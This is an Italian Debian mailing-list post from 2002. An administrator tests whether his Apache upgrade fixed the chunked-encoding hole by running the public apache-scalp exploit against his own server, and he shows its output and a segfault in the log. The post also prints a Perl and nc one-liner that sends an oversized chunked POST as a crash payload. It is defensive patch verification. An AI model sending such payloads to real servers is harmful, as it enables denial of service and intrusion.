Apache exploits..mah! (lunghetta)
appena ricevuta la notifica del "buchetto" di apache ho di corsa fatto
l'upgrade ma dopo alcuni test
un dubbio sorge:
Ho scaricato l'exploit da qui:
http://downloads.securityfocus.com/vulnerabilities/exploits/apache-scalp.c
l'ho compilato (Cygwin) e ho provato:
sul client:
pasquale@PORTATILE ~
$ ./exploit.exe 4 xxx.xxx.xxx.xxx:80
[*] Connecting.. connected!
[*] Currently using retaddr 0x90600, length 29896, localport 1458
Ooops.. hehehe!
pasquale@PORTATILE ~
$
I log del server:
test:/var/log/apache# tail -n 4 /var/log/apache/error.log
[Fri Jun 21 11:50:36 2002] [notice] SIGHUP received. Attempting to restart
[Fri Jun 21 11:50:36 2002] [notice] Apache/1.3.9 (Unix) Debian/GNU
PHP/4.0.3pl1 mod_perl/1.21_03-dev configured -- resuming normal operations
[Fri Jun 21 11:50:36 2002] [notice] suEXEC mechanism enabled (wrapper:
/usr/lib/apache/suexec)
[Fri Jun 21 12:06:49 2002] [notice] child pid 18380 exit signal Segmentation
fault (11)
^^^^^^^^^^^^^^^^^^^^^
test:/var/log/apache#
stesso risultato se faccio.
pasquale@PORTATILE ~
$ perl -e 'print "POST http://www/index.html HTTP/1.1\r\nAccept:
*/*\r\nHost:www\r\nContent-Type:
application/x-www-form-urlencoded\r\nTransfer-Encoding:
chunked\r\nContent-length: 5000\r\n\r\n" . "A"x5000 . "\r\n\r\n"' | nc
xxx.xxx.xxx.xxx 80
ma..e' stato corretto o sto vedendo mostri laddove non ci sono?
Grazie e ciao
pasquale
--
To UNSUBSCRIBE, email to debian-italian-request@lists.debian.org
with a subject of "unsubscribe". Trouble? Contact listmaster@lists.debian.org
Reply to: